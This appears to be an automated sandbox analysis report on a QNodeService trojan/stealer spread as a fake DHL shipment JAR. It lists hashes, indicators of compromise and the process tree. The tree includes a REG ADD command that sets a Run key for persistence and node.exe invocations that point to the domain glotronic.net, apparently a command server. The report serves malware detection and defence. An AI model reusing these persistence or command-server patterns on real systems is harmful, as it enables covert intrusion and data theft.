Analysis
-
max time kernel
34s -
max time network
126s -
platform
windows10_x64 -
resource
win10 -
submitted
19-10-2020 10:25
Static task
static1
Behavioral task
behavioral1
Sample
DHL_109401211_AWB09100903_12012900.jar
Resource
win7v200722
Behavioral task
behavioral2
Sample
DHL_109401211_AWB09100903_12012900.jar
Resource
win10
General
-
Target
DHL_109401211_AWB09100903_12012900.jar
-
Size
70KB
-
MD5
5b63a9bcee6e5f189d25cf270b579d05
-
SHA1
b3e0e86aff8fb3b156ebb53fc11153ae6c5d388b
-
SHA256
bffaedde078cf79c57bef9992503d088d21ea51957558a63e510b973c1e6f5fb
-
SHA512
c088674ff3c470cfa3ca86ac8bb4c8aa873434a98f2de4a35ec9afa63ce88f2cf0726dd54f9b143cd3b686bceb784e933d35f8636fb800ae946890f7ee96693f
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 3736 node.exe 1500 node.exe 1872 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\ef9c4691-b599-4409-9601-da6cc8dc66ae = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ad9e-171.dat js behavioral2/files/0x000100000001ad9e-175.dat js behavioral2/files/0x000100000001ad9e-179.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 wtfismyip.com 21 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3736 node.exe 3736 node.exe 3736 node.exe 3736 node.exe 1500 node.exe 1500 node.exe 1500 node.exe 1500 node.exe 1872 node.exe 1872 node.exe 1872 node.exe 1872 node.exe 1872 node.exe 1872 node.exe 1872 node.exe 1872 node.exe 1872 node.exe 1872 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3588 wrote to memory of 2452 3588 java.exe 74 PID 3588 wrote to memory of 2452 3588 java.exe 74 PID 2452 wrote to memory of 3736 2452 javaw.exe 78 PID 2452 wrote to memory of 3736 2452 javaw.exe 78 PID 3736 wrote to memory of 1500 3736 node.exe 80 PID 3736 wrote to memory of 1500 3736 node.exe 80 PID 1500 wrote to memory of 1872 1500 node.exe 81 PID 1500 wrote to memory of 1872 1500 node.exe 81 PID 1872 wrote to memory of 2420 1872 node.exe 83 PID 1872 wrote to memory of 2420 1872 node.exe 83 PID 2420 wrote to memory of 736 2420 cmd.exe 84 PID 2420 wrote to memory of 736 2420 cmd.exe 84
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\DHL_109401211_AWB09100903_12012900.jar1⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\c79dc872.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain glotronic.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_4ByXym\boot.js --hub-domain glotronic.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_4ByXym\boot.js --hub-domain glotronic.net5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "ef9c4691-b599-4409-9601-da6cc8dc66ae" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "ef9c4691-b599-4409-9601-da6cc8dc66ae" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:736
-
-
-
-
-
-